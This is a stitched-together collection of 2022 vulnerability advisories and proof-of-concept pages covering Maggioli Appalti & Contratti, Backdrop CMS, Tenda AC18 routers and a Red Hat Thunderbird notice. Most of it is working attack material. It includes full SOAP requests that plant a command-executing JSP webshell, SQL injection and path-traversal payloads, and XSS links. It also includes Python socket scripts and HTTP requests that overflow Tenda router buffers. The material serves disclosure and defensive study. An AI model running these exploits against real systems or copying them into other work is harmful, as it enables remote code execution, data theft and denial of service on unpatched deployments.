An issue was discovered in Appalti & Contratti 9.12.2. It allows Session Fixation. When a user logs in providing a JSESSIONID cookie that is issued by the server at the first visit, the cookie value is not updated after a successful login.

\# Authors: sababasecurity.com Red Team  
\# Vendor Homepage: https://www.maggioli.com

**I. INTRODUCTION**

The product “Appalti & Contratti,” is a modular platform consisting of several integrated web applications to support the Italian public administration in the computerized and telematic management of theirs process.

**II. DESCRIPTION**

**1\. Remote Code Execution through Apache Axis AdminService Exposed (CVE-2022-44784)**

The DL229 and LFS modules of “Appalti & Contratti” expose an Apache Axis 1.4 instance, when needed by the customer, under the respective paths https://host/DL229/services and https://host/LFS/services.  
The product is normally configured to expose a Reverse Proxy at port 443 in the same server that hosts all the application modules, that are instead served by Tomcat on a different port.  
Since the Reverse Proxy and the Tomcat instance serving the modules are in the same host, and the Reverse Proxy isn’t configured to exclude any route, it is possible to directly reach for the Apache Axis 1.4 AdminService as if the request is issued directly by the localhost. Any request is indeed received by the Reverse Proxy and then, from the Reverse Proxy is forwarded to the applications.  
The Apache Axis instance follows the default configuration, where the AdminService is only exposed to localhost:

confirming the assumption. The previous information has been leaked through the Local File Inclusion vulnerability, reachable by authenticated users, identified as CVE-2022-44786.  
When the Apache Axis AdminService is exposed, it is possible to create a LogHandler service that writes a jsp webshell in the application webroot, resulting in a Remote Code Execution.  
The complete details of the exploitation procedure are provided by Ambionics Security in their blog post “Oracle PeopleSoft Remote Code Execution: Blind XXE to SYSTEM Shell” (https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce#axis-update).  
Basically, the attack consists of exposing the “org.apache.axis.handlers.LogHandler” class as a service, to create a log file in the server webroot, writing to the log file through the service and, eventually, removing the service.  
The first two requests are shown below:

POST /MOD/services/AdminService HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: example.com
Content-Length: 1113

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<ns1:deployment
xmlns="http://xml.apache.org/axis/wsdd/"
xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"
xmlns:ns1="http://xml.apache.org/axis/wsdd/">
<ns1:service name="RandomService" provider="java:RPC">
<requestFlow>
<handler type="RandomLog"/>
</requestFlow>
<ns1:parameter name="className" value="java.util.Random"/>
<ns1:parameter name="allowedMethods" value="\*"/>
</ns1:service>
<handler name="RandomLog" type="java:org.apache.axis.handlers.LogHandler" > 
<parameter name="LogHandler.fileName" value="/opt/apache-tomcat-9.0.33/webapps/MOD/test\_sababa\_shell\_yu8Fyy23D7ZxPCeS.jsp" /> 
<parameter name="LogHandler.writeToConsole" value="false" /> 
</handler>
</ns1:deployment>
</soapenv:Body>
</soapenv:Envelope>

------------------------------------------------------

POST /MOD/services/RandomService HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: example.com
Content-Length: 1126

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://util.java">
<soapenv:Header/>
<soapenv:Body>
<util:ints soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<in0 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance"><!\[CDATA\[
<%@page import="java.util.\*,java.io.\*"%><% if (request.getParameter("p4WfhL16VokrRj1ss").equals("I41jqG\*XJ03@^KaO") && request.getParameter("D5e1U96oABaaq7BG") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("D5e1U96oABaaq7BG")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
\]\]></in0>
<in1 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance">?</in1>
</util:ints>
</soapenv:Body>
</soapenv:Envelope>

_**a. Business Impact**_

An attacker is capable of creating a jsp webshell directly in the webroot of the application, resulting in a Remote Code Execution.

**2\. Multiple SQL Injections (CVE-2022-44785)**

_**a. Unauthenticated SQL Injection**_

The web application modules “LFS”, “Vigilanza” and “DL229” implement the “GetListaEnti.do” functionality that accepts a URL parameter “cfamm”, which is subject to the mentioned vulnerability.  
By exploiting the issue on each application, it is possible to exfiltrate the entire content of each database in use.  
Since the underlying database is “Postgres”, it is possible to perform batched queries. This means that an attacker can perform multiple queries in the same statement.  
Consequently, an attacker could potentially introduce an “INSERT/DELETE/UPDATE” statement to change the database content, by properly manipulating the vulnerable parameter.  
Possible examples of the mentioned vulnerability are in the following URLs:

*   https://host/DL229/GetListaEnti.do?cfamm=F%27+UNION+ALL+SELECT+NULL%2cNULL%2cNULL%2d%2d
*   https://host/DL229/GetListaEnti.do?cfamm=F%27%3bSELECT+PG\_SLEEP%285%29%2d%2d

_**b. Authenticated time based SQL Injection**_

The web application modules “LFS”, “Vigilanza” and “DL229” are subject to multiple SQL Injections due to the way they create the parametrized SQL query to perform.  
More in detail, the “Trova.do” functionality at https://host/Vigilanza/Trova.do allows users to search for different resources, depending on the context the application is currently in.  
The search functionality allows to specify a variable number of “fields”, each of which is identified by a”defCampoN” POST body parameter, with N determining the number of the field in the search form.  
This field is composed of colon (i.e. “;”) separated strings. The first one of these is directly used as the column field of the “where” condition in the SQL parametrized query generated by the server.

Consequently, by directly replacing the column name with an arbitrary, nested, SQL statement, it is possible to perform an SQL Injection, as shown below:

POST /Vigilanza/Trova.do HTTP/1.1
Host: example.com
Cookie: JSESSIONID= 34F7164A1BF072446CB774A686C3CD1B
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 4360

jspPath=%2FWEB-INF%2Fpages%2Fgene%2Fimpr%2Fimpr-trova.jsp&jspPathTo=gene%2Fimpr%2Fimpr-lista.jsp&activePage=&isPopUp=0&numeroPopUp=&metodo=trova&entita=IMPR&filtro=&...\[snip\]...&Campo1\_where=&Campo1\_from=&Campo1\_computed=false&Campo1\_gestore=&Campo1\_conf=contiene&defCampo1=(SELECT+1+FROM+PG\_SLEEP(5))%3BT2000%3BN%3B&Campo1=...

The same behaviour also affects the “filtro” body parameter of the same POST request.

Analogously, the “Advanced search” allows to specify, for integer fields, whether to search for values “less than”, “greater than”, “equal to” the one specified by the user.  
This results in a POST body parameter like “Campo1\_conf” directly specifying the operator selected by the user, i.e. “<“, “>”, “=” respectively.  
The introduced parameter is directly used by the server to create the parametrized query to perform on the database.  
Consequently, by properly injecting an SQL construct as part of the “CampoX\_conf” parameter, it is possible to perform an SQL Injection attack.

POST /Vigilanza/Trova.do HTTP/1.1
Content-Length: 2372
Host: example.com
Cookie: JSESSIONID= 34F7164A1BF072446CB774A686C3CD1B
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

jspPath=%2FWEB-INF%2Fpages%2Fw9%2Fw9gara%2Fw9gara-trova.jsp&jspPathTo=w9%2Fw9gara%2Fw9gara-lista.jsp&...\[snip\]...&Campo1\_where=&Campo1\_from=&Campo1\_computed=false&Campo1\_gestore=&Campo1\_conf=%3D1+and+1+IN+(SELECT+1+FROM+PG\_SLEEP(3))+OR+1%3C%3E&...\[snip\]...

In a similar way, the POST request to https://host/DL229/ApriPagina.do is used to perform a search request and, in the “trovaAddWhere” body parameter, it is sent part of the SQL statement that will be embedded into the parametrized query that is performed.

POST /DL229/ApriPagina.do?\_csrf=0TM8-4VQG-B1K7-RD4D-MIMU-1FH3-IAQW-OYD1 HTTP/1.1
Host: example.com
Cookie: JSESSIONID=481BA32AF2A220443F35C52A1935D4D4
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 281

href=dl229%2Fprog\_anag%2Fprog\_anag-lista.jsp&entita=PROG\_ANAG&trovaFrom=PROG\_ANAG&trovaAddWhere=%28PROG\_ANAG.PROGETTO\_ARCHIVIATO+%3C%3E+%3F+AND+1+IN+(SELECT+1+FROM+PG\_SLEEP(3))&trovaParameter=T%3A1&risultatiPerPagina=20&\_csrf=0TM8-4VQG-B1K7-RD4D-MIMU-1FH3-IAQW-OYD1

_**c. Business Impact**_

An attacker can exploit the mentioned flaws to dump the entire database content. Alternatively, it is possible to perform INSERT/UPDATE/DELETE statements due to the support of batched queries from Postgre SQL, which is trivial for the unauthenticated case.

**3\. Local File Inclusion (CVE-2022-44786)**

The “ApriPagina.do” main landing page of each module, strongly relies on the “href” URL parameter to decide which “jsp” page to include.  
The “jsp” page is indeed directly embedded by the “ApriPagina.do” endpoint and directory traversal is also accepted and not sanitized in any way.

However, by trying to access any non “jsp” content, the server answers with an error message.  
In order to bypass this, it is possible to access “hrefs” like the following: “..;/..;/WEB-INF/web.xml;index.jsp”.  
The final URL to dump the “WEB-INF/web.xml” file is something like:

*   https://host/DL229/ApriPagina.do?href=..;/..;/WEB-INF/web.xml;index.jsp

This happens because, likely, the sanitization procedure checks that the URL refers to a “jsp” page which, for the mentioned “href”, is true.  
However, Apache Tomcat, the underlying servlet container, parses the web path provided and , for each part, considers anything after the “;” to be a parameter and automatically strips it.  
In other words, what is actually accessed is the final “href” of “../../WEB-INF/web.xml”, successfully retrieving the “web.xml” configuration file of the web application, as shown below.

_**a. Business Impact**_

An attacker can dump several Class files and known XML configuration files, retrieving useful internal details about the software.  
In general, it is possible to download arbitrary files (except for “jsp” pages) that are under the root of the affected module.

**4\. Reflected Cross-Site Scripting (CVE-2022-44787)**

The web application modules are vulnerable to a Reflected Cross-Site Scripting issue in the specific “ApriPopup.do” endpoint, as follows:

*   https://host/Vigilanza/ApriPopup.do?href=commons%5chelpDiPagina.jsp&idPagina=W9.W9GARA-test+%3cdiv+style%3d%27height:1000px;width:1000px%27+onmouseenter%3d%27alert%28document.location%29%27%3e&numeroPopUp=1
*   https://host/LFS/ApriPopup.do?href=commons%5chelpDiPagina.jsp&idPagina=W9.W9GARA-test+%3cdiv+style%3d%27height:1000px;width:1000px%27+onmouseenter%3d%27alert%28document.location%29%27%3e&numeroPopUp=1
*   https://host/DL229/ApriPopup.do?href=commons%5chelpDiPagina.jsp&idPagina=W9.W9GARA-test+%3cdiv+style%3d%27height:1000px;width:1000px%27+onmouseenter%3d%27alert%28document.location%29%27%3e&numeroPopUp=1

More in detail, the “idPagina” parameter is reflected inside the server response without any HTML encoding, resulting in a Reflected Cross-Site Scripting attack when the victim moves the mouse pointer inside the page.  
The target endpoint, actually, does seem to perform some sort of sanitization, removing some malicious tags and attributes, however, not all attributes are correctly sanitized.  
As an example, the “onmouseenter” attribute used in the mentioned payload is not sanitized, resulting in a Cross-Site Scripting attack.

_**a. Business Impact**_

An attacker can send a malicious link to a designated victim and execute Javascript code in the context of the victim’s authenticated session.

**5\. JSESSIONID Session Fixation (CVE-2022-44788)**

Session Fixation is an attack that permits an attacker to hijack a valid user session.  
The attack exploits a limitation in the way the web application manages the session ID, more specifically the vulnerable web application, when authenticating a user, doesn’t assign a new session ID, making it possible to use an existing one.  
Consequently, the attack consists of obtaining a valid session ID (e.g. by connecting to the application),inducing a user to authenticate himself with that session ID, and then hijacking the user-validated session by the knowledge of the used session ID.

The target web applications are subject to the mentioned issue since, when the user logs in providing the “JSESSIONID” cookie that is issued by the server at the first visit, the cookie value is not updated after a successful login.

_**a. Business Impact**_

An attacker that manages to exfiltrate the JSESSIONID of an unauthenticated user can hijack the user session when the victim authenticates successfully.

**III. SYSTEM AFFECTED**

All modules prior to the following versions are vulnerable: DL229 v4.2.4, LFS v9.48.1, FEU v4.12.1, Appalti v9.12.2.

**IV. VULNERABILITY HISTORY**  
Sep 02th, 2022: Vendor notification  
Oct 04th, 2022: Vendor fixed the issues

**V. LEGAL NOTICES**  
The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information.

CVE-2022-44788: Maggioli Appalti & Contratti, Multiple Vulnerabilities - BackBox.org Membership

Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content.

**Backdrop CMS version 1.23.0****Vulnerability Explanation:**

Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Post content.

**Attack Vectors:**

The attacker must post something on the "Post content" and insert the XSS payload at the "Body" input, and pick the Raw HTML Editor in order to exploit the stored XSS. The XSS payload will be launched immediately after save.

**Affected:**

*   http://ip\_address/backdrop/node/add/post
    
*   POST /backdrop/node/add/post
    

**Payload :**

*   <img src=x onerror=confirm('Grim-The-Ripper-Team-by-SOSECURE-Thailand')>

**Tested on:**

1.  Backdrop CMS version 1.23.0 (https://github.com/backdrop/backdrop/releases/tag/1.23.0)
    
2.  Firefox version 105
    

**Steps to attack:**

1.  Enter your username and password; the account must have admin privileges.
2.  Select Content > add content > Post
3.  Enter information into the form provided.
4.  Enter the XSS payload in the Body field.
5.  Choose "Raw HTML" Editor and Save.
6.  The XSS payload will run immediately.

**Discoverer:**

 Grim The Ripper Team by SOSECURE Thailand

**Medium:**

**Disclosure Timeline:**

*   2022–09–27: Vulnerability discovered.
*   2022–09–27: Vulnerability reported to the MITRE corporation.
*   2022–10–15: CVE has been reserved.
*   2022–10–31: Public disclosure of the vulnerability.

Reference:

3.  https://github.com/backdrop/backdrop/releases/tag/1.23.0
    
4.  https://backdropcms.org

CVE-2022-42096: GitHub - bypazs/CVE-2022-42096: Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Post content.

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetMacFilterCfg.

Permalink

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formSetMacFilterCfg function, which can be accessed through the URL goform/SetMacFilterCfg.

Go to the function sub_C1334

Go to the function sub_C15F8

In formSetMacFilterCfg function, deviceList is controllable and finally will be passed into the sub_C15F8 function.

In the sub_C15F8 function, it is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**PoC**

POST /goform/setMacFilterCfg HTTP/1.1
Host: 192.168.0.1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: \*/\*
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
Content\-Type: application/x\-www\-form\-urlencoded; charset\=UTF\-8
X\-Requested\-With: XMLHttpRequest
Content\-Length: 51
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/iptv.html?random\=0.7642888131213508&
Cookie: password\=7c90ed4e4d4bf1e300aa08103057ccbcmho1qw

macFilterType\=1&deviceList\=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

CVE-2022-44175: IoT_vuln/readme.md at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.05 is vulnerable to Buffer Overflow via function formSetDeviceName.

Permalink

Cannot retrieve contributors at this time

**Tenda AC18(V15.03.05.05) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2610.html

**Affected version**

V15.03.05.05

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formSetDeviceName function, which can be accessed through the URL goform/SetDeviceName.

In formSetDeviceName function, devName is controllable and will be passed into the local_1c parameter. Then local_1c will be spliced into acStack412 by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**PoC**

import socket
import os
li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')
ip \= '192.168.0.1'
port \= 80
r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
r.connect((ip, port))
rn \= b'\\r\\n'
p1 \= b'a' \* 0x300
p2 \= b'devName=' + p1
p3 \= b"POST /goform/SetDeviceName" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111; curShow=; ac\_login\_info=passwork; test=A" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44174: IoT_vuln/Tenda_AC18_V15.03.05.05_Vuln_devName.md at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formWifiWpsStart.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formWifiWpsStart function, which can be accessed through the URL goform/WifiWpsStart .

The index and mode are controllable. If the conditions are met to sprintf, they will be spliced into tmp. It is worth noting that there is no size check,which leads to a stack overflow vulnerability. This vulnerability allows attackers to cause a Denial of Service (DoS).

**PoC**

Poc of Denial of Service(DoS)

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'mode=1&index=' + p1

p3 \= b"POST /goform/WifiWpsStart" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2
r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44177: IoT_vuln/Tenda/AC18/formWifiWpsStart at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetWifiGuestBasic.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formSetWifiGuestBasic function, which can be accessed through the URL goform/SetWifiGuestBasic.

In formSetWifiGuestBasic function, v14 is controllable and will be passed into the sub_7EA98 function. In the sub_7EA98 function, a2 will be spliced into s by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

In set_wl_guest_qos_list function

In sub_7EA98 function

**PoC**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'shareSpeed=' + p1

p3 \= b"POST /goform/SetWifiGuestBasic" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44183: IoT_vuln/Tenda/AC18/formSetWifiGuestBasic at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow. via function formWifiWpsOOB.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formWifiWpsOOB function, which can be accessed through the URL goform/WifiWpsOOB .

The index is controllable. If the conditions are met to sprintf, they will be spliced into tmp. It is worth noting that there is no size check, which leads to a stack overflow vulnerability. An attacker can obtain a stable root shell through a carefully constructed payload.

**PoC**

Poc of Denial of Service(DoS)

POST /goform/WifiWpsOOB HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 336
Origin: http://192.168.0.1
DNT: 1
Connection: close
Referer: http://192.168.0.1/index.html
Cookie: ecos\_pw=eee:language=cn

index=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-44178: IoT_vuln/Tenda/AC18/formWifiWpsOOB at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function addWifiMacFilter.

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the addWifiMacFilter function, which can be accessed via the URL goform/addWifiMacFilter.

deviceId, deviceMac, are controllable and will be copied to nptr by sprintf. It is worth noting that the size is not checked, resulting in a stack overflow vulnerability.

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80
r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
r.connect((ip, port))
rn \= b'\\r\\n'
p1 \= b'a' \* 0x3000
p2 \= b'device\_id=1&device\_mac=' + p1
p3 \= b"POST /goform/addWifiMacFilter" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44180: IoT_vuln/Tenda/AC18/addWifiMacFilter at main · RobinWang825/IoT_vuln

An update for thunderbird is now available for Red Hat Enterprise Linux 9.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-45403: Mozilla: Service Workers might have learned size of cross-origin media files
* CVE-2022-45404: Mozilla: Fullscreen notification bypass
